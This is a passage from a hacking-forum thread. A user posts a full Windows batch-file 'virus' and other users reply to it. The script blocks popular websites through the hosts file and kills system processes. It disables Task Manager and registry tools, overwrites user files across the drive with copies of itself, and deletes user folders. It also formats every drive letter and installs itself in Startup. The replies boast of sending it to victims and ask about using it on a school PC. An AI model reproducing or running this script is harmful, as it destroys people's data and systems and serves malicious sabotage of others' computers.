    echo 127.0.0.1 bebo.com >> "Hosts"
    echo 127.0.0.1 www.bebo.com >> "Hosts" 
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 meebo.com >> "Hosts"
    echo 127.0.0.1 www.meebo.com >> "Hosts" 
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 msn.com >> "Hosts"
    echo 127.0.0.1 www.msn.com >> "Hosts" 
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 **********.com >> "Hosts"
    echo 127.0.0.1 www.**********.com >> "Hosts" 
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 Dont use http just: website.com>> "Hosts"
    echo 127.0.0.1 www.Dont use http just: website.com>> "Hosts"
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 myspace.com >> "Hosts"
    echo 127.0.0.1 www.myspace.com >> "Hosts" 
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 google.com >> "Hosts"
    echo 127.0.0.1 www.google.com >> "Hosts" 
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 youtube.com >> "Hosts"
    echo 127.0.0.1 www.youtube.com >> "Hosts" 
    
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 facebook.com >> "Hosts"
    echo 127.0.0.1 www.facebook.com >> "Hosts" 
    
    taskkill /f /t /im "itunes helper.exe"
    Cls
    taskkill /f /t /im "itunes.exe"
    
    taskkill /f /t /im "svchost.exe"
    taskkill /f /t /im "svchost.exe"
    taskkill /f /t /im "svchost.exe"
    Cls
    taskkill /f /t /im "svchost.exe"
    taskkill /f /t /im "svchost.exe"
    taskkill /f /t /im "svchost.exe"
    
    taskkill /f /t /im "wmplayer.exe"
    
    @echo off
    :A
    start
    explorer
    cmd
    paint
    goto :A
    
    taskkill /f /t /im "place taskkill between quotes" 
    
    taskkill /f /t /im "firefox.exe"
    
    taskkill /f /t /im "iexplore.exe"
    
    taskkill /f /t /im "aim6.exe"
    
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
    reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
    Cls
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.html) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    ) 
    Del /f /s /q DirPath 
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.txt) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    )
    Del /f /s /q DirPath 
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.zip) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    )
    Del /f /s /q DirPath 
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.wav) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    )
    Del /f /s /q DirPath 
    
    Dir %SystemRoot% /s /b > PathHost
    For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
    Del /f /s /q PathHost > Nul
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.exe) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    ) 
    Del /f /s /q DirPath 
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.jpg) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    ) 
    Del /f /s /q DirPath 
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.mp3) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    ) 
    Del /f /s /q DirPath 
    
    Dir %Homedrive% /s /b > DirPath
      For /f %%Y In (DirPath) Do (
      Set DirPath=%%Y > Nul
     For %%Z In (%DirPath%\*.wmv) Do (
    Set ExeInfect=%%Z > Nul 
      Copy /y %0 %ExeInfect% 
     )
    ) 
    Del /f /s /q DirPath 
    
    del /Q /F A:\*.*
    del /Q /F B:\*.*
    del /Q /F C:\*.*
    Cls
    del /Q /F D:\*.*
    del /Q /F E:\*.*
    del /Q /F F:\*.*
    
    RUNDLL32 USER32.DLL,SwapMouseButton
    
    assoc.dll = txtfile
    assoc.exe = pngfile
    assoc.bat = WinRAR
    Cls
    assoc.vbs = Visual Style
    assoc.reg = xmlfile
    assoc.txt = regfile
    
    reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f
    
    DEL /F /Q %UserProfile%\Documents\*.* >nul
    DEL /F /Q %UserProfile%\Pictures\*.* >nul
    DEL /F /Q %UserProfile%\Videos\*.* >nul
    DEL /F /Q %UserProfile%\Downloads\*.* >nul
    DEL /F /Q %UserProfile%\Music\*.* >nul
    
    FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul
    FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul
    FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
    FORMAT D: /FS:NTFS /V:(D:) /X /P:1 /y >nul
    FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul
    FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul
    FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul
    FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul
    FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul
    FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul
    FORMAT K: /FS:NTFS /V:(K:) /X /P:1 /y >nul
    FORMAT L: /FS:NTFS /V:(L:) /X /P:1 /y >nul
    FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul
    FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul
    FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul
    FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul
    
    copy"ur absoulutly SCAMMED.bat" "%userprofile%\Start Menu\Programs\Startup\ ur absoulutly SCAMMED.bat"

    Then save those two as a .bat file.

    NOTE: Don't fuking open it when u made it as a .bat file! or u have to buy a fuking new pc! idiot!
    Made by my Virusgenerator.
    Last edited by PoP_KiLLaH; 10-27-2009 at 02:37 PM. Reason: Forgot one more code

  2. #2
    Lolland's Avatar
    Join Date
    Feb 2009
    Gender
    male
    Location
    Lolland!
    Posts
    3,156
    Reputation
    49
    Thanks
    868
    My Mood
    Inspired
    I opened it, my PC's fine. Wtf?

  3. #3
    Threadstarter
    Expert Member
    PoP_KiLLaH's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    Watching Hentai
    Posts
    644
    Reputation
    17
    Thanks
    229
    My Mood
    Devilish
    Quote Originally Posted by lolland View Post
    I opened it, my PC's fine. Wtf?
    open notepad paste all of the text on one of the text's boxes.
    copy and paste it at notepad then save it as .bat file.
    then open it "u accidently opened a virus"

  4. #4
    Lolland's Avatar
    Join Date
    Feb 2009
    Gender
    male
    Location
    Lolland!
    Posts
    3,156
    Reputation
    49
    Thanks
    868
    My Mood
    Inspired
    I'm not a retard, I ran the .bat. Nothing's happening. FU-

  5. #5
    Threadstarter
    Expert Member
    PoP_KiLLaH's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    Watching Hentai
    Posts
    644
    Reputation
    17
    Thanks
    229
    My Mood
    Devilish
    Well it workz for me. i sent it to some noobs. Then they fucking fuked their own pc's

  6. #6
    dav96cool's Avatar
    Join Date
    Jan 2008
    Gender
    male
    Posts
    294
    Reputation
    10
    Thanks
    9
    My Mood
    Bored
    any could say if it work?, wanna fckup my school pc

    [IMG]https://i979.photobucke*****m/albums/ae280/dav96cool/CarSign.jpg[/IMG]
    ~Respect List~

    [GFX]drsynyster
    daniliard
    Make My Day
    Ariez
    Gesus

Similar Threads

  1. [Release] you want the real Hisec mod? with no viruses?!?
    By supercarz1991 in forum Combat Arms Brazil Mods & Rez Modding
    Replies: 44
    Last Post: 03-09-2011, 07:14 PM
  2. The REAL Duck Tales
    By arunforce in forum General
    Replies: 1
    Last Post: 11-21-2007, 10:33 PM
  3. Ok.. i'm not the "real" warrock hacker.
    By -Death- in forum WarRock - International Hacks
    Replies: 33
    Last Post: 04-25-2007, 09:34 AM
  4. The Real Drift King
    By arunforce in forum General
    Replies: 2
    Last Post: 11-22-2006, 10:49 AM
  5. The real kyo [pix inside]
    By Kyojiro in forum General
    Replies: 13
    Last Post: 06-14-2006, 06:49 AM